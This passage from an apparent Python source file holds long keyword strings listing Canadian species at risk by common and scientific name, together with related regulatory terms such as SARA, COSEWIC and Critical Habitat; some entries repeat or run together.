Bogbean Buckmoth
Hemileuca sp.
Gypsy Cuckoo Bumble Bee
Bombus bohemicus
Rusty-patched Bumble Bee
Bombus affinis
Taylor\'s Checkerspot
Euphydryas editha taylori
Olive Clubtail
Stylurus olivaceus
Rapids Clubtail
Gomphus quadricolor
Riverine Clubtail
Stylurus amnicola
Skillet Clubtail
Gomphus ventricosus
Hungerford\'s Crawling Water Beetle
Brychius hungerfordi
Macropis Cuckoo Bee
Epeoloides pilosulus
Bert\'s Predaceous Diving Beetle
Sanfilippodytes bertae
Eastern Persius Duskywing
Erynnis persius persius
Okanagan Efferia
Efferia okanagana
Hine\'s Emerald
Somatochlora hineana
White Flower Moth
Schinia bimatris
Gold-edged Gem
Schinia avemensis
Behr\'s Hairstreak
Satyrium behrii
Half-moon Hairstreak
Satyrium semiluna
Mormon Metalmark
Apodemia mormo
Dusky Dune Moth
Copablepharon longipenne
Edwards\' Beach Moth
Anarta edwardsii
Five-spotted Bogus Yucca Moth
Prodoxus quinquepunctellus
Non-pollinating Yucca Moth
Tegeticula corruptrix
Sand-verbena Moth
Copablepharon fuscum
Yucca Moth
Tegeticula yuccasella
Maritime Ringlet
Coenonympha nipisiquit
Dakota Skipper
Hesperia dacotae
Poweshiek Skipperling
Oarisma poweshiek
Ottoe Skipper
Hesperia ottoe
False-foxglove Sun Moth
Pyrrhia aurantiago
Cobblestone Tiger Beetle
Cicindela marginipennis
Northern Barrens Tiger Beetle
Cicindela patruela
Wallis\' Dark Saltflat Tiger Beetle
Cicindela parowana wallisi
Pallid Bat
Antrozous pallidus
Wood Bison
Bison bison athabascae
Woodland Caribou
Rangifer tarandus caribou
Ermine haidarum subspecies
Mustela erminea haidarum
Grey Fox
Urocyon cinereoargenteus
Swift Fox
Vulpes velox
American Marten
Martes americana atrata
Black-tailed Prairie Dog
Cynomys ludovicianus
Short-tailed Birds
Albatross
Phoebastria albatrus
Least Bittern
Ixobrychus exilis
Bobolink
Dolichonyx oryzivorus
Lark Bunting
Calamospiza melanocorys
Red Crossbill percna
percna
Loxia curvirostra percna
Olive-sided Flycatcher
Contopus cooperi
Northern Goshawk laingi
laingi
Accipiter gentilis laingi
Ross\'s Gull
Rhodostethia rosea
Ferruginous Hawk
Buteo regalis
Red Knot roselaari type
Calidris canutus roselaari
roselaari
Chestnut-collared Longspur
Calcarius ornatus
McCown\'s Longspur
Rhynchophanes mccownii
Eastern Meadowlark
Sturnella magna
Marbled Murrelet
Brachyramphus marmoratus
Common Nighthawk
Chordeiles minor
Barn Owl
Tyto alba
Northern Saw-whet Owl brooksi
brooksi
Aegolius acadicus brooksi
Sprague\'s Pipit
Anthus spragueii
Western Screech-owl kennicottii
kennicottii
Megascops kennicottii kennicottii
Megascops kennicottii macfarlanei
Loggerhead Shrike excubitorides
excubitorides
Lanius ludovicianus excubitorides
Bank Swallow
Riparia riparia
Barn Swallow
Hirundo rustica
Chimney Swift
Chaetura pelagica
Bicknell\'s Thrush
Catharus bicknelli
Wood Thrush
Hylocichla mustelina
Canada Warbler
Wilsonia canadensis
Golden-winged Warbler
Vermivora chrysoptera
Louisiana Waterthrush
Parkesia motacilla
Whip-poor-will
Caprimulgus vociferus
Lewis\'s Woodpecker
Melanerpes lewis
Rocky Mountain Tailed Frog
Ascaphus montanus
Western Chorus Frog
Pseudacris triseriata
Coastal Giant Salamander
Dicamptodon tenebrosus
Spring Salamander
Gyrinophilus porphyriticus
Great Basin Spadefoot
Spea intermontana
Great Basin Reptiles
Gophersnake
Pituophis catenifer deserticola
Massasauga
Sistrurus catenatus
Eastern Yellow-bellied Racer
Coluber constrictor flaviventris
Gray Ratsnake
Pantherophis spiloides
Western Rattlesnake
Crotalus oreganos
Eastern Ribbonsnake
Thamnophis sauritus
Eastern Hog-nosed Snake
Heterodon platirhinos
Blanding\'s Turtle
Emydoidea blandingii
Wood Turtle
Glyptemys insculpta
Dromedary Jumping-slug
Hemphillia dromedarius
Blue-grey Taildropper
Prophysaon coeruleum
Verna\'s Flower Moth
Schinia verna
Dun Skipper
Euphyes vestris
Sable Island Sweat Bee
Lasioglossum sablense
Audouin\'s Night-stalking Tiger Beetle
Omus audouini
Gibson\'s Big Sand Tiger Beetle
Cicindela formosa gibsoni
Badger taxus
taxus
Taxidea taxus taxus
Spotted Bat
Euderma maculatum
Grizzly Bear
Ursus arctos
Polar Bear
Ursus maritimus
Mountain Beaver
Aplodontia rufa
Barren-ground Caribou
Rangifer tarandus groenlandicus
Woodland Caribou
Rangifer tarandus caribou
Nuttall\'s Cottontail nuttallii
nuttallii
Sylvilagus nuttallii nuttallii
Eastern Mole
Scalopus aquaticus
Western Harvest Mouse megalotis subspecies
Reithrodontomys megalotis megalotis
Collared Pika
Ochotona collaris
Woodland Vole
Microtus pinetorum
Eastern Wolf
Canis lupus lycaon
Wolverine
Gulo gulo
Black-footed Birds
Albatross
Phoebastria nigripes
Cassin\'s Auklet
Ptychoramphus aleuticus
Rusty Blackbird
Euphagus carolinus
Long-billed Curlew
Numenius americanus
Harlequin Duck
Histrionicus histrionicus
Peregrine Falcon anatum/tundrius
Falco peregrinus anatum/tundrius
Peregrine Falcon pealei subspecies
Falco peregrinus pealei
Barrow\'s Goldeneye
Bucephala islandica
Horned Grebe
Podiceps auritus
Western Grebe
Aechmophorus occidentalis
Evening Grosbeak
Coccothraustes vespertinus
Great Blue Heron fannini
fannini
Ardea herodias fannini
Red Knot islandica subspecies
Calidris canutus islandica
Ancient Murrelet
Synthliboramphus antiquus
Flammulated Owl
Otus flammeolus
Short-eared Owl
Asio flammeus
Red-necked Phalarope
Phalaropus lobatus
Band-tailed Pigeon
Patagioenas fasciata
Yellow Rail
Coturnicops noveboracensis
Buff-breasted Sandpiper
Tryngites subruficollis
Baird\'s Sparrow
Ammodramus bairdii
Grasshopper Sparrow pratensis subspecies
Ammodramus savannarum pratensis
Savannah Sparrow princeps subspecies
Passerculus sandwichensis princeps
Eastern Wood-pewee
Contopus virens
Coastal Tailed Amphibians
Ascaphus truei
Northern Leopard Frog
Lithobates pipiens
Red-legged Frog
Rana aurora
Coeur d\'Alene Salamander
Plethodon idahoensis
Wandering Salamander
Aneides vagrans
Western Tiger Salamander
Ambystoma mavortium
Great Plains Toad
Anaxyrus cognatus
Western Toad
Anaxyrus boreas
Western Toad
Anaxyrus boreas
Rubber Boa
Charina bottae
Milksnake
Lampropeltis triangulum
Western Yellow-bellied Racer
Coluber constrictor mormon
Prairie Rattlesnake
Crotalus viridis
Eastern Ribbonsnake
Thamnophis sauritus
Five-lined Skink
Plestiodon fasciatus
Prairie Skink
Plestiodon septentrionalis
Western Skink
Plestiodon skiltonianus
Eastern Musk Turtle
Sternotherus odoratus
Eastern Painted Turtle
Chrysemys picta picta
Midland Painted Turtle
Chrysemys picta marginata
Northern Map Turtle
Graptemys geographica
Snapping Turtle
Chelydra serpentina
Western Painted Turtle
Chrysemys picta bellii
Lake Erie Watersnake
Nerodia sipedon insularum
Brook Floater
Alasmidonta varicosa
Warty Jumping-slug
Hemphillia glandulosa
Haida Gwaii Slug
Staala gwaii
Pygmy Slug
Kootenaia burkei
Sheathed Slug
Zacoleus idahoensis
Threaded Vertigo
Nearctula sp.
Magnum Mantleslug
Magnipelta mycophaga
Yellow-banded Bumble Bee
Bombus terricola
Vivid Dancer
Argia vivida
Greenish-white Grasshopper
Hypochlora alba
Red-tailed Leafhopper
Aflexia rubranura
Red-tailed Leafhopper
Aflexia rubranura
Mormon Metalmark
Apodemia mormo
Monarch
Danaus plexippus
Pale Yellow Dune Moth
Copablepharon grandis
Sonora Skipper
Polites sonora
Pygmy Snaketail
Ophiogomphus howei
Georgia Basin Bog Spider
Gnaphosa snohomish
Dune Tachinid Fly
Germaria angustata
Weidemeyer\'s Admiral
Limenitis weidemeyerii
orca
Northern Abalone
Haliotis kamtschatkana
Rayed Bean
Villosa fabalis
Fawnsfoot
Truncilla donaciformis
Kidneyshell
Ptychobranchus fasciolaris
Lilliput
Toxolasma parvum
Salamander Mussel
Simpsonaias ambigua
Round Pigtoe
Pleurobema sintoxia
Northern Riffleshell
Epioblasma torulosa rangiana
Banff Springs Snail
Physella johnsoni
Snuffbox
Epioblasma triquetra
Atlantic Mud-piddock
Barnea truncata
Mapleleaf
Quadrula quadrula
Threehorn Wartyback
Obliquaria reflexa
Sea Otter
Enhydra lutris
Harbour Porpoise
Phocoena phocoena
Steller Sea Lion
Eumetopias jubatus
whale
marine mammal
marine organisms
Bowhead Whale
Balaena mysticetus
Fin Whale
Balaenoptera physalus
Grey Whale
Eschrichtius robustus
Humpback Whale
Megaptera novaeangliae
Sowerby\'s Beaked Whale
Brook Floater
Alasmidonta varicosa
Wavy-rayed Lampmussel
Lampsilis fasciola
Yellow Lampmussel
Lampsilis cariosa
Mapleleaf
Quadrula quadrula
Rocky Mountain Ridged Mussel
Gonidea angulata
Olympia Oyster
Ostrea lurida
Eastern Pondmussel
Ligumia nasuta
Rainbow
Villosa iris
Harbour Seal Lacs des Loups Marins
Seal
Phoca vitulina mellonae
Pacific Water Shrew
Sorex bendirii
Whale
Beluga Whale
Delphinapterus leucas
Blue Whale
Balaenoptera musculus
Blue Whale
Balaenoptera musculus
Killer Whale
Orcinus orca
North Atlantic Right Whale
Eubalaena glacialis
North Pacific Right Whale
Eubalaena japonica
Northern Bottlenose Whale
Hyperoodon ampullatus
Sei Whale
Balaenoptera borealis
Beluga Whale
Delphinapterus leucas
Fin Whale
Balaenoptera physalus
Killer Whale
Orcinus orcaesoplodon bidens
clam
scallop
butterfly"""
Species_at_Risk = """Species at Risk
Species of Special Status
Rare Species
SARA
s. 73
section 73
Species At Risk Act
Endangered Species
Threatened Species
Endangered Wildlife
Critical Habitat
COSEWIC
Committee on the Status of Endangered Wildlife in Canada
Critical habitat
Designation
Schedule 1
At Risk
Endangered
Critical timing window
Restricted activity period
Canadian Wildlife Service
CWS
Recovery Strategy
Action Plan
Permit
Caribou
Bat
special conservation status
American Badger jacksoni
jaksoni
Badger
Taxidea taxus jacksoni
American Badger jeffersonii
Taxidea taxus jeffersonii
American Badger jeffersonii
jeffersonii
Taxidea taxus jeffersonii
Tri-coloured Bat
Perimyotis subflavus
Peary Caribou
Caribou
Rangifer tarandus pearyi
Woodland Caribou
Rangifer tarandus caribou
Ord\'s Kangaroo Rat
Dipodomys ordii
Vancouver Island Marmot
Marmota vancouverensis
Townsend\'s Mole
Scapanus townsendii
Western Harvest Mouse dychei
dychei
Reithrodontomys megalotis dychei
Little Brown Myotis
Myotis
Myotis lucifugus
Northern Myotis
Myotis septentrionalis
Harbour Seal Lacs des Loups Marins
Seal
Phoca vitulina mellonae
Pacific Water Shrew
Sorex bendirii
Whale
Beluga Whale
Delphinapterus leucas
Blue Whale
Balaenoptera musculus
Blue Whale
Balaenoptera musculus
Killer Whale
Orcinus orca
North Atlantic Right Whale
Eubalaena glacialis
North Pacific Right Whale
Eubalaena japonica
Northern Bottlenose Whale
Hyperoodon ampullatus
Sei Whale
Balaenoptera borealis
Northern Bobwhite
Colinus virginianus
Yellow-breasted Chat auricollis
auricollis
Icteria virens auricollis
Yellow-breasted Chat virens
virens
Icteria virens virens
Whooping Crane
Grus americana
Eskimo Curlew
Numenius borealis
Acadian Flycatcher
Empidonax virescens
Horned Grebe
Podiceps auritus
Ivory Gull
Pagophila eburnea
Red Knot rufa
rufa
Calidris canutus rufa
Streaked Horned Lark
Eremophila alpestris strigata
Barn Owl
Tyto alba
Burrowing Owl
Athene cunicularia
Spotted Owl caurina
caurina
Strix occidentalis caurina
Mountain Plover
Charadrius montanus
Piping Plover circumcinctus
circuinctus
Charadrius melodus circumcinctus
Piping Plover melodus
melodus
Charadrius melodus melodus
King Rail
Rallus elegans
Greater Sage-Grouse urophasianus subspecies
Centrocercus urophasianus urophasianus
Williamson\'s Sapsucker
Sphyrapicus thyroideus
Pink-footed Shearwater
Ardenna creatopus
Loggerhead Shrike migrans
migrans
Lanius ludovicianus migrans
Coastal Vesper Sparrow
Pooecetes gramineus affinis
Henslow\'s Sparrow
Ammodramus henslowii
Black Swift
Cypseloides niger
Roseate Tern
Sterna dougallii
Sage Thrasher
Oreoscoptes montanus
Cerulean Warbler
Setophaga cerulea
Kirtland\'s Warbler
Dendroica kirtlandii
Prothonotary Warbler
Protonotaria citrea
Red-headed Woodpecker
Melanerpes erythrocephalus
White-headed Woodpecker
Picoides albolarvatus
Cricket Frog
Acris blanchardi
Northern Leopard Frog
Lithobates pipiens
Oregon Spotted Frog
Rana pretiosa
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Eastern Tiger Salamander
Ambystoma tigrinum
Jefferson Salamander
Ambystoma jeffersonianum
Northern Dusky Salamander
Desmognathus fuscus
Small-mouthed Salamander
Ambystoma texanum
Western Tiger Salamander
Ambystoma mavortium
Fowler\'s Toad
Anaxyrus fowleri
Eastern Reptiles
Foxsnake
Pantherophis gloydi
Eastern Foxsnake
Pantherophis gloydi
Butler\'s Gartersnake
Thamnophis butleri
Greater Short-horned Lizard
Phrynosoma hernandesi
Massasauga
Sistrurus catenatus
Desert Nightsnake
Hypsiglena chlorophaea
Queensnake
Regina septemvittata
Blue Racer
Coluber constrictor foxii
Gray Ratsnake
Pantherophis spiloides
Leatherback Sea Turtle
Dermochelys coriacea
Leatherback Sea Turtle
Dermochelys coriacea
Loggerhead Sea Turtle
Caretta caretta
Five-lined Skink
Plestiodon fasciatus
Sharp-tailed Snake
Contia tenuis
Spiny Softshell
Apalone spinifera
Blanding\'s Turtle
Emydoidea blandingii
Spotted Turtle
Clemmys guttata
Western Painted Turtle
Chrysemys picta bellii
Striped Bass
Morone saxatilis
Silver Chub
Macrhybopsis storeriana
Lake Chubsucker
Erimyzon sucetta
Shortnose Cisco
Coregonus reighardi
Spring Cisco
Coregonus sp.
Nooksack Dace
Rhinichthys cataractae ssp.
Redside Dace
Clinostomus elongatus
Speckled Dace
Rhinichthys osculus
Channel Darter
Percina copelandi
Channel Darter
Percina copelandi
Spotted Gar
Lepisosteus oculatus
Western Brook Lamprey
Lampetra richardsoni
Northern Madtom
Noturus stigmosus
Copper Redhorse
Moxostoma hubbsi
Atlantic Salmon
Salmo salar
Basking Shark
Cetorhinus maximus
White Shark
Carcharodon carcharias
Carmine Shiner
Notropis percobromus
Rainbow Smelt
Osmerus mordax
Rainbow Smelt
Osmerus mordax
Enos Lake Benthic Threespine Stickleback
Gasterosteus aculeatus
Enos Lake Limnetic Threespine Stickleback
Misty Lake Lentic Threespine Stickleback
Misty Lake Lotic Threespine Stickleback
Vananda Creek Benthic Threespine Stickleback
Vananda Creek Limnetic Threespine Stickleback
Gasterosteus aculeatus
White Sturgeon
Acipenser transmontanus
Rainbow Trout
Oncorhynchus mykiss
Atlantic Whitefish
Coregonus huntsmani
Northern Molluscs
Abalone
Haliotis kamtschatkana
Rayed Bean
Villosa fabalis
Fawnsfoot
Truncilla donaciformis
Broad-banded Forestsnail
Allogona profunda
Oregon Forestsnail
Allogona townsendiana
Proud Globelet
Patera pennsylvanica
Hickorynut
Obovaria olivaria
Round Hickorynut
Obovaria subrotunda
Kidneyshell
Ptychobranchus fasciolaris
Lilliput
Toxolasma parvum
Salamander Mussel
Simpsonaias ambigua
Hotwater Physa
Physella wrighti
Round Pigtoe
Pleurobema sintoxia
Northern Riffleshell
Epioblasma torulosa rangiana
Banff Springs Snail
Physella johnsoni
Snuffbox
Epioblasma triquetra
Island Blue
Plebejus saepiolus insulanus
Aweme Borer
Papaipema aweme
Hoptree Borer
Prays atomocella
Bogbean Buckmoth
Hemileuca sp.
Gypsy Cuckoo Bumble Bee
Bombus bohemicus
Rusty-patched Bumble Bee
Bombus affinis
Taylor\'s Checkerspot
Euphydryas editha taylori
Olive Clubtail
Stylurus olivaceus
Rapids Clubtail
Gomphus quadricolor
Riverine Clubtail
Stylurus amnicola
Skillet Clubtail
Gomphus ventricosus
Hungerford\'s Crawling Water Beetle
Brychius hungerfordi
Macropis Cuckoo Bee
Epeoloides pilosulus
Bert\'s Predaceous Diving Beetle
Sanfilippodytes bertae
Eastern Persius Duskywing
Erynnis persius persius
Okanagan Efferia
Efferia okanagana
Hine\'s Emerald
Somatochlora hineana
White Flower Moth
Schinia bimatris
Gold-edged Gem
Schinia avemensis
Behr\'s Hairstreak
Satyrium behrii
Half-moon Hairstreak
Satyrium semiluna
Mormon Metalmark
Apodemia mormo
Dusky Dune Moth
Copablepharon longipenne
Edwards\' Beach Moth
Anarta edwardsii
Five-spotted Bogus Yucca Moth
Prodoxus quinquepunctellus
Non-pollinating Yucca Moth
Tegeticula corruptrix
Sand-verbena Moth
Copablepharon fuscum
Yucca Moth
Tegeticula yuccasella
Maritime Ringlet
Coenonympha nipisiquit
Dakota Skipper
Hesperia dacotae
Poweshiek Skipperling
Oarisma poweshiek
Ottoe Skipper
Hesperia ottoe
False-foxglove Sun Moth
Pyrrhia aurantiago
Cobblestone Tiger Beetle
Cicindela marginipennis
Northern Barrens Tiger Beetle
Cicindela patruela
Wallis\' Dark Saltflat Tiger Beetle
Cicindela parowana wallisi
Gattinger\'s Agalinis
Agalinis gattingeri
Rough Agalinis
Agalinis aspera
Skinner\'s Agalinis
Agalinis skinneriana
Scarlet Ammannia
Ammannia robusta
Short-rayed Alkali Aster
Symphyotrichum frondosum
Eastern Mountain Avens
Geum peckii
Deltoid Balsamroot
Balsamorhiza deltoidea
Tall Beakrush
Rhynchospora macrostachya
Cherry Birch
Betula lenta
Bluehearts
Buchnera americana
Fernald\'s Braya
Braya fernaldii
Hairy Braya
Braya pilosa
Long\'s Braya
Braya longii
Tall Bugbane
Actaea elata
Bashful Bulrush
Trichophorum planifolium
Slender Bush-clover
Lespedeza virginica
California Buttercup
Ranunculus californicus
Water-plantain Buttercup
Ranunculus alismifolius
Butternut
Juglans cinerea
Eastern Prickly Pear Cactus
Opuntia humifusa
Spalding\'s Campion
Silene spaldingii
Coastal Scouler\'s Catchfly
Silene scouleri grandis
Muhlenberg\'s Centaury
Centaurium muehlenbergii
American Chestnut
Castanea dentata
Colicroot
Aletris farinosa
Slender Collomia
Collomia tenella
American Columbo
Frasera caroliniensis
Pink Coreopsis
Coreopsis rosea
Eastern Flowering Dogwood
Cornus florida
Contorted-pod Evening-primrose
Camissonia contorta
Southern Maidenhair Fern
Adiantum capillus-veneris
Eastern Prairie Fringed-orchid
Platanthera leucophaea
Western Prairie Fringed-orchid
Platanthera praeclara
Plymouth Gentian
Sabatia kennedyana
White Prairie Gentian
Gentiana alba
American Ginseng
Panax quinquefolius
Virginia Goat\'s-rue
Tephrosia virginiana
Showy Goldenrod
Solidago speciosa
Rayless Goldfields
Lasthenia glaberrima
Forked Three-awned Grass
Aristida basiramea
Fascicled Ironweed
Vernonia fasciculata
Tweedy\'s Lewisia
Lewisiopsis tweedyi
Small-flowered Lipocarpha
Lipocarpha micrantha
Seaside Birds-foot Lotus
Lotus formosissimus
Furbish\'s Lousewort
Pedicularis furbishiae
Dense-flowered Lupine
Lupinus densiflorus
Prairie Lupine
Lupinus lepidus
Streambank Lupine
Lupinus rivularis
Virginia Mallow
Sida hermaphrodita
White Meconella
Meconella oregana
Coast Microseris
Microseris bigelovii
Pink Milkwort
Polygala incarnata
Hoary Mountain-mint
Pycnanthemum incanum
Red Mulberry
Morus rubra
Phantom Orchid
Cephalanthera austiniae
Bearded Owl-clover
Triphysaria versicolor
Grand Coulee Owl-clover
Orthocarpus barbatus
Rosy Owl-clover
Orthocarpus bracteosus
Victoria\'s Owl-clover
Castilleja victoriae
Golden Paintbrush
Castilleja levisecta
Branched Phacelia
Phacelia ramosissima
Whitebark Pine
Pinus albicaulis
Heart-leaved Plantain
Plantago cordata
Large Whorled Pogonia
Isotria verticillata
Nodding Pogonia
Triphora trianthophora
Small Whorled Pogonia
Isotria medeoloides
Ogden\'s Pondweed
Potamogeton ogdenii
Fragrant Popcornflower
Plagiobothrys figuratus
Stoloniferous Pussytoes
Antennaria flagellaris
Engelmann\'s Quillwort
Isoetes engelmannii
Quebec Rockcress
Boechera quebecensis
Kellogg\'s Rush
Juncus kelloggii
Pink Sand-verbena
Abronia umbellata
Small-flowered Sand-verbena
Tripterocalyx micranthus
Dwarf Sandwort
Minuartia pusilla
False Hop Sedge
Carex lupuliformis
Foothill Sedge
Carex tumulicola
Juniper Sedge
Carex juniperorum
Lindley\'s False Silverpuffs
Uropappus lindleyi
Brook Spike-primrose
Epilobium torreyi
Dense Spike-primrose
Epilobium densiflorum
Bent Spike-rush
Eleocharis geniculata
Bent Spike-rush
Eleocharis geniculata
Horsetail Spike-rush
Eleocharis equisetoides
Thread-leaved Sundew
Drosera filiformis
Small-flowered Tonella
Tonella tenella
Toothcup
Rotala ramosior
Cucumber Tree
Magnolia acuminata
Bog Bird\'s-foot Trefoil
Lotus pinnatus
Drooping Trillium
Trillium flexipes
Howell\'s Triteleia
Triteleia howellii
Bird\'s-foot Violet
Viola pedata
Yellow Montane Violet praemorsa
praemorsa
Viola praemorsa ssp. praemorsa
Barrens Willow
Salix jejuna
Spotted Wintergreen
Chimaphila maculata
Wood-poppy
Stylophorum diphyllum
Tall Woolly-heads
Psilocarphus elatior
Dwarf Woolly-heads
Psilocarphus brevissimus
Batwing Vinyl Lichen
Leptogium platynum
Boreal Felt Lichen
Erioderma pedicellatum
Pale-bellied Frost Lichen
Physconia subpallida
Seaside Centipede Lichen
Heterodermia sitchensis
Vole Ears Lichen
Erioderma mollissimum
Rusty Cord-moss
Entosthodon rubiginosus
Acuteleaf Small Limestone Moss
Seligeria acutifolia
Margined Streamside Moss
Scouleria marginata
Nugget Moss
Microbryum vlassovii
Poor Pocket Moss
Fissidens pauperculus
Rigid Apple Moss
Bartramia stricta
Roell\'s Brotherella Moss
Brotherella roellii
Silver Hair Moss
Fabronia pusilla
Pallid Bat
Antrozous pallidus
Wood Bison
Bison bison athabascae
Woodland Caribou
Rangifer tarandus caribou
Ermine haidarum subspecies
Mustela erminea haidarum
Grey Fox
Urocyon cinereoargenteus
Swift Fox
Vulpes velox
American Marten
Martes americana atrata
Black-tailed Prairie Dog
blacktailed prairie dog
dog
cat
Cynomys ludovicianus
Beluga Whale
Delphinapterus leucas
Fin Whale
Balaenoptera physalus
Killer Whale
Orcinus orca
Short-tailed Birds
Albatross
Phoebastria albatrus
Least Bittern
Ixobrychus exilis
Bobolink
Dolichonyx oryzivorus
Lark Bunting
Calamospiza melanocorys
Red Crossbill percna
percna
Loxia curvirostra percna
Olive-sided Flycatcher
Contopus cooperi
Northern Goshawk laingi
laingi
Accipiter gentilis laingi
Ross\'s Gull
Rhodostethia rosea
Ferruginous Hawk
Buteo regalis
Red Knot roselaari type
Calidris canutus roselaari
roselaari
Chestnut-collared Longspur
Calcarius ornatus
McCown\'s Longspur
Rhynchophanes mccownii
Eastern Meadowlark
Sturnella magna
Marbled Murrelet
Brachyramphus marmoratus
Common Nighthawk
Chordeiles minor
Barn Owl
Tyto alba
Northern Saw-whet Owl brooksi
brooksi
Aegolius acadicus brooksi
Sprague\'s Pipit
Anthus spragueii
Western Screech-owl kennicottii
kennicottii
Megascops kennicottii kennicottii
Megascops kennicottii macfarlanei
Loggerhead Shrike excubitorides
excubitorides
Lanius ludovicianus excubitorides
Bank Swallow
Riparia riparia
Barn Swallow
Hirundo rustica
Chimney Swift
Chaetura pelagica
Bicknell\'s Thrush
Catharus bicknelli
Wood Thrush
Hylocichla mustelina
Canada Warbler
Wilsonia canadensis
Golden-winged Warbler
Vermivora chrysoptera
Louisiana Waterthrush
Parkesia motacilla
Whip-poor-will
Caprimulgus vociferus
Lewis\'s Woodpecker
Melanerpes lewis
Rocky Mountain Tailed Frog
Ascaphus montanus
Western Chorus Frog
Pseudacris triseriata
Coastal Giant Salamander
Dicamptodon tenebrosus
Spring Salamander
Gyrinophilus porphyriticus
Great Basin Spadefoot
Spea intermontana
Great Basin Reptiles
Gophersnake
Pituophis catenifer deserticola
Massasauga
Sistrurus catenatus
Eastern Yellow-bellied Racer
Coluber constrictor flaviventris
Gray Ratsnake
Pantherophis spiloides
Western Rattlesnake
Crotalus oreganos
Eastern Ribbonsnake
Thamnophis sauritus
Eastern Hog-nosed Snake
Heterodon platirhinos
Blanding\'s Turtle
Emydoidea blandingii
Wood Turtle
Glyptemys insculpta
Eastern Sand Darter
Ammocrypta pellucida
Eastern Sand Darter
Ammocrypta pellucida
Vancouver Lamprey
Entosphenus macrostomus
Plains Minnow
Hybognathus placitus
Pugnose Minnow
Opsopoeodus emiliae
Western Silvery Minnow
Hybognathus argyritis
Black Redhorse
Moxostoma duquesnei
Coastrange Sculpin
Cottus aleuticus
Rocky Mountain Sculpin
Cottus sp.
Pugnose Shiner
Notropis anogenus
Silver Shiner
Notropis photogenis
Spotted Wolffish
Anarhichas minor
Mountain Sucker
Catostomus platyrhynchus
Salish Sucker
Catostomus sp. cf. catostomus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Northern Wolffish
Anarhichas denticulatus
Atlantic Mud-piddock
Barnea truncata
Dromedary Jumping-slug
Hemphillia dromedarius
Mapleleaf
Quadrula quadrula
Blue-grey Taildropper
Prophysaon coeruleum
Threehorn Wartyback
Obliquaria reflexa
Verna\'s Flower Moth
Schinia verna
Dun Skipper
Euphyes vestris
Sable Island Sweat Bee
Lasioglossum sablense
Audouin\'s Night-stalking Tiger Beetle
Omus audouini
Gibson\'s Big Sand Tiger Beetle
Cicindela formosa gibsoni
Griscom’s Arnica
Arnica griscomii ssp. griscomii
Anticosti Aster
Symphyotrichum anticostense
Gulf of St. Lawrence Aster
Symphyotrichum laurentianum
Western Silvery Aster
Symphyotrichum sericeum
White Wood Aster
Eurybia divaricata
Willowleaf Aster
Symphyotrichum praealtum
Eastern Baccharis
Baccharis halimifolia
Branched Bartonia
Bartonia paniculata ssp. paniculata
Dense Blazing Star
Liatris spicata
Kentucky Coffee-tree
Gymnocladus dioicus
Tiny Cryptantha
Cryptantha minima
Lakeside Daisy
Hymenoxys herbacea
Deerberry
Vaccinium stamineum
Gray\'s Desert-parsley
Lomatium grayi
Lemmon\'s Holly Fern
Polystichum lemmonii
Mountain Holly Fern
Polystichum scopulinum
Victorin\'s Gentian
Gentianopsis virgata ssp. victorinii
Showy Goldenrod
Solidago speciosa
Goldenseal
Hydrastis canadensis
Smooth Goosefoot
Chenopodium subglabrum
Round-leaved Greenbrier
Smilax rotundifolia
Dwarf Hackberry
Celtis tenuifolia
Wild Hyacinth
Camassia scilloides
Van Brunt\'s Jacob’s-ladder
Polemonium vanbruntiae
Small White Lady\'s-slipper
Cypripedium candidum
Hare-footed Locoweed
Oxytropis lagopus
Macoun\'s Meadowfoam
Limnanthes macounii
Mexican Mosquito-fern
Azolla mexicana
Slender Mouse-ear-cress
Halimolobos virgata
Cliff Paintbrush
Castilleja rupicola
Sweet Pepperbush
Clethra alnifolia
Showy Phlox
Phlox speciosa ssp. occidentalis
Slender Popcornflower
Plagiobothrys tenellus
Bolander\'s Quillwort
Isoetes bolanderi
False Rue-anemone
Enemion biternatum
Bear\'s-foot Sanicle
Sanicula arctopoides
Purple Sanicle
Sanicula bipinnatifida
Soapweed
Yucca glauca
Western Spiderwort
Tradescantia occidentalis
Hill\'s Thistle
Cirsium hillii
Toothcup
Rotala ramosior
Purple Twayblade
Liparis liliifolia
American Water-willow
Justicia americana
Green-scaled Willow
Salix chlorolepis
Blunt-lobed Woodsia
Woodsia obtusa
Seaside Bone
Hypogymnia heterophylla
Black-foam Lichen
Anzia colpodes
Crumpled Tarpaper Lichen
Collema coniophilum
Wrinkled Shingle Lichen
Pannaria lurida
Eastern Waterfan
Peltigera hydrothyria
Porsild\'s Bryum
Mielichhoferia macrocarpa
Alkaline Wing-nerved Moss
Pterygoneurum kozlovii
Haller\'s Apple Moss
Bartramia halleriana
Spoon-leaved Moss
Bryoandersonia illecebra
Badger taxus
taxus
Taxidea taxus taxus
Spotted Bat
Euderma maculatum
Grizzly Bear
Ursus arctos
Polar Bear
Ursus maritimus
Mountain Beaver
Aplodontia rufa
Barren-ground Caribou
Rangifer tarandus groenlandicus
Woodland Caribou
Rangifer tarandus caribou
Nuttall\'s Cottontail nuttallii
nuttallii
Sylvilagus nuttallii nuttallii
Eastern Mole
Scalopus aquaticus
Western Harvest Mouse megalotis subspecies
Reithrodontomys megalotis megalotis
Sea Otter
Enhydra lutris
Collared Pika
Ochotona collaris
Harbour Porpoise
Phocoena phocoena
Steller Sea Lion
Eumetopias jubatus
Woodland Vole
Microtus pinetorum
Bowhead Whale
Balaena mysticetus
Fin Whale
Balaenoptera physalus
Grey Whale
Eschrichtius robustus
Humpback Whale
Megaptera novaeangliae
Sowerby\'s Beaked Whale
Mesoplodon bidens
Eastern Wolf
Canis lupus lycaon
Wolverine
Gulo gulo
Black-footed Birds
Albatross
Phoebastria nigripes
Cassin\'s Auklet
Ptychoramphus aleuticus
Rusty Blackbird
Euphagus carolinus
Long-billed Curlew
Numenius americanus
Harlequin Duck
Histrionicus histrionicus
Peregrine Falcon anatum/tundrius
Falco peregrinus anatum/tundrius
Peregrine Falcon pealei subspecies
Falco peregrinus pealei
Barrow\'s Goldeneye
Bucephala islandica
Horned Grebe
Podiceps auritus
Western Grebe
Aechmophorus occidentalis
Evening Grosbeak
Coccothraustes vespertinus
Great Blue Heron fannini
fannini
Ardea herodias fannini
Red Knot islandica subspecies
Calidris canutus islandica
Ancient Murrelet
Synthliboramphus antiquus
Flammulated Owl
Otus flammeolus
Short-eared Owl
Asio flammeus
Red-necked Phalarope
Phalaropus lobatus
Band-tailed Pigeon
Patagioenas fasciata
Yellow Rail
Coturnicops noveboracensis
